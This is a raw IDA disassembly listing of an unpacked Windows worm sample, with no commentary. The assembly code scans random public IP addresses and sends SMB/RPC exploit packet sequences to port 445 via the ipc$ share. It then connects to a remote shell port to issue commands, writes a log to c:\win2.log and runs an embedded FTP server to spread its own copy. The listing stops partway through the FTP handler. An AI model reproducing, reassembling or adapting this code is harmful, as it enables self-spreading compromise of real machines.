;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 74F51B0C7761FF950B443F88DF9B33E9
; File Name : u:\work\74f51b0c7761ff950b443f88df9b33e9_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401EF0:loc_401F35�p ...
mov eax, ds:dword_406F30
imul eax, 343FDh
add eax, 279EC3h
mov ds:dword_406F30, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_402029+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_406F30, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_402029+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call ds:dword_405114 ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call ds:dword_40510C ; inet_addr
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401EF0+1A�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call ds:dword_405104 ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call ds:dword_405110 ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call ds:dword_405108 ; inet_ntoa
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call ds:dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401EF0+E2�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call ds:dword_4050F4 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call ds:dword_4050F8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call ds:dword_40511C ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call ds:dword_40510C ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call ds:dword_405110 ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc ds:dword_406F34
push edi
push ds:dword_406F34
lea eax, [ebp+var_14]
push offset aI ; "%i"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call ds:dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+var_14]
push esi
push eax
call sub_402210
mov esi, ds:dword_405020
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push edi
call esi ; _lwrite
push [ebp+arg_0]
call sub_402210
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; _lwrite
push edi
call ds:dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 270Ch
call ds:dword_4050F4 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_406F38
push eax
call ds:dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push ds:off_406030
lea eax, [ebp+var_33C]
push eax
call ds:dword_4050E0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_402210
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call ds:dword_4050F0 ; send
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_402210
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call ds:dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call ds:dword_40511C ; closesocket
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_406F38
push [ebp+arg_4]
call ds:dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402290
add esp, 2Ch
push [ebp+arg_0]
call ds:dword_405110 ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call ds:dword_4050F8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call ds:dword_4050F4 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4021B0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, ds:dword_4050F0
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, ds:dword_4050EC
call esi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call ds:dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call ds:dword_40511C ; closesocket
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_4025D0
mov eax, ds:dword_406A34
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, ds:dword_406A38
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402290
add esp, 2Ch
push 270Ch
call ds:dword_4050F4 ; ntohs
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402290
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4021B0
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402290
lea eax, [ebp+var_14]
push eax
call sub_402210
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402290
add esp, 2Ch
imul ebx, 3Ch
mov eax, ds:dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4021B0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402290
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402290
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A2C
push eax
call sub_402290
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402290
add esp, 40h
push esi
call sub_402210
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402290
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4021B0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4021B0
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call ds:dword_4050F4 ; ntohs
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_4021B0
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, ds:dword_4050F0
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, ds:dword_4050EC
call edi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402290
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402290
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402290
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402290
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402290
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402290
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402290
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402290
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call ds:dword_405028 ; Sleep
push [ebp+var_4]
call ds:dword_40511C ; closesocket
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: sub_402029+3A�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A40
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; DATA XREF: sub_401E65+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E29
push esi
push edi
push 0
push ds:off_4068D0
call sub_402210
mov esi, ds:dword_4050F0
pop ecx
push eax
push ds:off_4068D0
push ebx
call esi ; send
mov edi, [ebp+arg_0]
jmp short loc_401B46
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: sub_401B08+310�j
mov ebx, [ebp+arg_0]
loc_401B46: ; CODE XREF: sub_401B08+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call ds:dword_4050EC ; recv
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401B97
push 0
push ds:off_4068D4
call sub_402210
pop ecx
push eax
push ds:off_4068D4
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401B97: ; CODE XREF: sub_401B08+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401BC8
push 0
push ds:off_4068D8
call sub_402210
pop ecx
push eax
push ds:off_4068D8
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401BC8: ; CODE XREF: sub_401B08+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401CA4
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
mov ax, ds:word_406A60
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402680
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C17: ; CODE XREF: sub_401B08+159�j
test ebx, ebx
jz short loc_401C4B
cmp edi, 4
jge short loc_401C2E
push ebx
call sub_401E30
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C2E: ; CODE XREF: sub_401B08+116�j
jnz short loc_401C3A
push ebx
call sub_401E30
pop ecx
mov [ebp+var_18], eax
loc_401C3A: ; CODE XREF: sub_401B08:loc_401C2E�j
cmp edi, 5
jnz short loc_401C4E
push ebx
call sub_401E30
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C4E
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: sub_401B08+111�j
push 6
pop edi
loc_401C4E: ; CODE XREF: sub_401B08+135�j
; sub_401B08+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402680
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C17
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push ds:off_4068E0
call sub_402210
pop ecx
push eax
push ds:off_4068E0
jmp loc_401DD7
; ---------------------------------------------------------------------------
loc_401CA4: ; CODE XREF: sub_401B08+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401DDC
push 0
push ds:off_4068E4
